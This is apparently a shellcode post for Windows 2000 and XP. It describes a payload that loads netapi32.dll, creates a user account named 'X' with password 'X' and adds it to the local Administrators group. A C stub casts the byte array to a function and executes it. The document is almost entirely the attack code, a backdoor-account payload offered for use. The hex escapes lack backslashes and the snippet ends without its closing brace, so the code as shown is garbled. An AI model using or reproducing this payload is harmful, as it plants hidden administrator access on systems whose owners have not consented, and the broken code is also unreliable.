This payload will load netapi32.dll and call NetUserAdd followed by NetLocalGroupAddMembers. It will create a new user account with the username and password of "X" and add it to the local group "Administrators". This payload has been tested against Windows 2000 and Windows XP, it will not work on Windows 9x systems.

char code[] =
"x66x81xecx80x00x89xe6xe8xb7x00x00x00x89x06x89xc3"
"x53x68x7exd8xe2x73xe8xbdx00x00x00x89x46x0cx53x68"
"x8ex4ex0execxe8xafx00x00x00x89x46x08x31xdbx53x68"
"x70x69x33x32x68x6ex65x74x61x54xffxd0x89x46x04x89"
"xc3x53x68x5exdfx7cxcdxe8x8cx00x00x00x89x46x10x53"
"x68xd7x3dx0cxc3xe8x7ex00x00x00x89x46x14x31xc0x31"
"xdbx43x50x68x72x00x73x00x68x74x00x6fx00x68x72x00"
"x61x00x68x73x00x74x00x68x6ex00x69x00x68x6dx00x69"
"x00x68x41x00x64x00x89x66x1cx50x68x58x00x00x00x89"
"xe1x89x4ex18x68x00x00x5cx00x50x53x50x50x53x50x51"
"x51x89xe1x50x54x51x53x50xffx56x10x8bx4ex18x49x49"
"x51x89xe1x6ax01x51x6ax03xffx76x1cx6ax00xffx56x14"
"xffx56x0cx56x6ax30x59x64x8bx01x8bx40x0cx8bx70x1c"
"xadx8bx40x08x5exc2x04x00x53x55x56x57x8bx6cx24x18"
"x8bx45x3cx8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01"
"xebxe3x32x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38"
"xe0x74x07xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1"
"x8bx5ax24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04"
"x8bx01xe8xebx02x31xc0x89xeax5fx5ex5dx5bxc2x08x00";

int main(int argc, char **argv)
{
int (*funct)();
funct = (int (*)()) code;
(int)(*funct)();